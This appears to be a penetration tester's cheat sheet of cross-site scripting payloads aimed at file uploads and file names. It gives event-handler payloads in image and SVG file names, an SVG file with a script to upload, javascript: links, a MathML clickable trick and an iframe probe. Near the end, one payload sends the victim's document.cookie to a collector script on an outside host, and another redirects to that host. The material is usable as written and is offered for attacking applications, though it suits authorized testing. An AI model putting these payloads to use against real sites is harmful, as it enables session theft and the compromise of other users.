<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
<a href="javascript:alert(1)">XSS</a
Copy and paste the following payload into a .SVG
file and attempt to upload it to the application.
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS via SVG");
</script>
</svg>
Copy and paste the following payload into a text editor and see if the image is loaded, if so attempt to follow up with a payload:
<iframe
src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/movingcart_1.svg"
frameborder="0"
></iframe>
<svg xmlns="http://www.w3.org/2000/svg">
<script>alert(document.domain)</script>
</svg>
Math element which can make HTML element clickable:
<math>
<xss href="javascript:alert(1337)">
Click Me
</xss>
</math>
<img/src/onerror=document.location="https://parzival.sh">
<img/src/onerror=document.location="http://parzival.sh/cookie.php?c="+document.cookie>
{% embed url="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet" %}
{% embed url="https://github.com/cure53/H5SC" %}